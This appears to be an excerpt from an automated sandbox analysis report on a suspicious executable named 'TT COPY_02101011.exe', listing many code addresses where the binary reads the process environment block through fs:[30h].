Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]	1_2_00AC002D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]	1_2_00AC002D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]	1_2_00AC002D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]	1_2_00B64015
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]	1_2_00B64015
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]	1_2_00B17016
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]	1_2_00B17016
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]	1_2_00B17016
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]	1_2_00B61074
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]	1_2_00B52073
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]	1_2_00AB0050
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]	1_2_00AB0050
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC61A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]	1_2_00AC61A0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]	1_2_00B151BE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]	1_2_00B151BE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]	1_2_00B151BE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]	1_2_00B151BE
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]	1_2_00B169A6
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]	1_2_00ACA185
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]	1_2_00ABC182
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]	1_2_00AC2990
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A9B1E1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A9B1E1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00A9B1E1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]	1_2_00B241E8
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]	1_2_00AB4120
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]	1_2_00AC513A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]	1_2_00AC513A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]	1_2_00A99100
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]	1_2_00A99100
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]	1_2_00A99100
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]	1_2_00A9C962
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]	1_2_00A9B171
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]	1_2_00A9B171
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]	1_2_00ABB944
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]	1_2_00ABB944
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]	1_2_00A952A5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]	1_2_00A952A5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]	1_2_00A952A5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]	1_2_00A952A5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]	1_2_00A952A5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00AAAAB0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00AAAAB0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]	1_2_00ACFAB0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]	1_2_00ACD294
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]	1_2_00ACD294
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]	1_2_00AC2AE4
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2ACB mov eax, dword ptr fs:[00000030h]	1_2_00AC2ACB
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]	1_2_00AD4A2C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD4A2C mov eax, dword ptr fs:[00000030h]	1_2_00AD4A2C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA8A0A mov eax, dword ptr fs:[00000030h]	1_2_00AA8A0A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]	1_2_00B5AA16
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5AA16 mov eax, dword ptr fs:[00000030h]	1_2_00B5AA16
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB3A1C mov eax, dword ptr fs:[00000030h]	1_2_00AB3A1C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]	1_2_00A95210
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A95210 mov ecx, dword ptr fs:[00000030h]	1_2_00A95210
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]	1_2_00A95210
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A95210 mov eax, dword ptr fs:[00000030h]	1_2_00A95210
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A9AA16
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9AA16 mov eax, dword ptr fs:[00000030h]	1_2_00A9AA16
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]	1_2_00B4B260
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B4B260 mov eax, dword ptr fs:[00000030h]	1_2_00B4B260
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B68A62 mov eax, dword ptr fs:[00000030h]	1_2_00B68A62
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD927A mov eax, dword ptr fs:[00000030h]	1_2_00AD927A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5EA55 mov eax, dword ptr fs:[00000030h]	1_2_00B5EA55
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B24257 mov eax, dword ptr fs:[00000030h]	1_2_00B24257
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]	1_2_00A99240
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]	1_2_00A99240
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]	1_2_00A99240
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A99240 mov eax, dword ptr fs:[00000030h]	1_2_00A99240
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AC4BAD
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AC4BAD
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4BAD mov eax, dword ptr fs:[00000030h]	1_2_00AC4BAD
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B65BA5 mov eax, dword ptr fs:[00000030h]	1_2_00B65BA5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]	1_2_00AA1B8F
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA1B8F mov eax, dword ptr fs:[00000030h]	1_2_00AA1B8F
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B4D380 mov ecx, dword ptr fs:[00000030h]	1_2_00B4D380
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2397 mov eax, dword ptr fs:[00000030h]	1_2_00AC2397
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACB390 mov eax, dword ptr fs:[00000030h]	1_2_00ACB390
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5138A mov eax, dword ptr fs:[00000030h]	1_2_00B5138A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]	1_2_00ABDBE9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC03E2 mov eax, dword ptr fs:[00000030h]	1_2_00AC03E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]	1_2_00B153CA
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B153CA mov eax, dword ptr fs:[00000030h]	1_2_00B153CA
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5131B mov eax, dword ptr fs:[00000030h]	1_2_00B5131B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]	1_2_00A9DB60
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]	1_2_00AC3B7A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC3B7A mov eax, dword ptr fs:[00000030h]	1_2_00AC3B7A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9DB40 mov eax, dword ptr fs:[00000030h]	1_2_00A9DB40
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B68B58 mov eax, dword ptr fs:[00000030h]	1_2_00B68B58
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9F358 mov eax, dword ptr fs:[00000030h]	1_2_00A9F358
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA849B mov eax, dword ptr fs:[00000030h]	1_2_00AA849B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]	1_2_00B16CF0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]	1_2_00B16CF0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16CF0 mov eax, dword ptr fs:[00000030h]	1_2_00B16CF0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B514FB mov eax, dword ptr fs:[00000030h]	1_2_00B514FB
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B68CD6 mov eax, dword ptr fs:[00000030h]	1_2_00B68CD6
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACBC2C mov eax, dword ptr fs:[00000030h]	1_2_00ACBC2C
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B51C06 mov eax, dword ptr fs:[00000030h]	1_2_00B51C06
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]	1_2_00B6740D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]	1_2_00B6740D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B6740D mov eax, dword ptr fs:[00000030h]	1_2_00B6740D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]	1_2_00B16C0A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]	1_2_00B16C0A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]	1_2_00B16C0A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16C0A mov eax, dword ptr fs:[00000030h]	1_2_00B16C0A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB746D mov eax, dword ptr fs:[00000030h]	1_2_00AB746D
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]	1_2_00B2C450
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2C450 mov eax, dword ptr fs:[00000030h]	1_2_00B2C450
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACA44B mov eax, dword ptr fs:[00000030h]	1_2_00ACA44B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC35A1 mov eax, dword ptr fs:[00000030h]	1_2_00AC35A1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AC1DB5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AC1DB5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00AC1DB5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]	1_2_00B605AC
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B605AC mov eax, dword ptr fs:[00000030h]	1_2_00B605AC
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]	1_2_00A92D8A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]	1_2_00A92D8A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]	1_2_00A92D8A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]	1_2_00A92D8A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A92D8A mov eax, dword ptr fs:[00000030h]	1_2_00A92D8A
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]	1_2_00AC2581
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]	1_2_00AC2581
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]	1_2_00AC2581
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC2581 mov eax, dword ptr fs:[00000030h]	1_2_00AC2581
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]	1_2_00ACFD9B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ACFD9B mov eax, dword ptr fs:[00000030h]	1_2_00ACFD9B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B48DF1 mov eax, dword ptr fs:[00000030h]	1_2_00B48DF1
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00AAD5E0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00AAD5E0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B5FDE2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B5FDE2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B5FDE2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]	1_2_00B5FDE2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B16DC9 mov eax, dword ptr fs:[00000030h]	1_2_00B16DC9
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B68D34 mov eax, dword ptr fs:[00000030h]	1_2_00B68D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B1A537 mov eax, dword ptr fs:[00000030h]	1_2_00B1A537
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B5E539 mov eax, dword ptr fs:[00000030h]	1_2_00B5E539
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AC4D3B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AC4D3B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC4D3B mov eax, dword ptr fs:[00000030h]	1_2_00AC4D3B
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9AD30 mov eax, dword ptr fs:[00000030h]	1_2_00A9AD30
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]	1_2_00AA3D34
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]	1_2_00ABC577
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]	1_2_00ABC577
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]	1_2_00AD3D43
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]	1_2_00B13540
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]	1_2_00AB7D50
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B60EA5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B60EA5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00B60EA5
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]	1_2_00B146A7
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]	1_2_00B2FE87
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]	1_2_00AA76E2
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]	1_2_00AC16E0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]	1_2_00B68ED6
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]	1_2_00AC36CC
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]	1_2_00AD8EC7
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]	1_2_00B4FEC0
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]	1_2_00A9E620
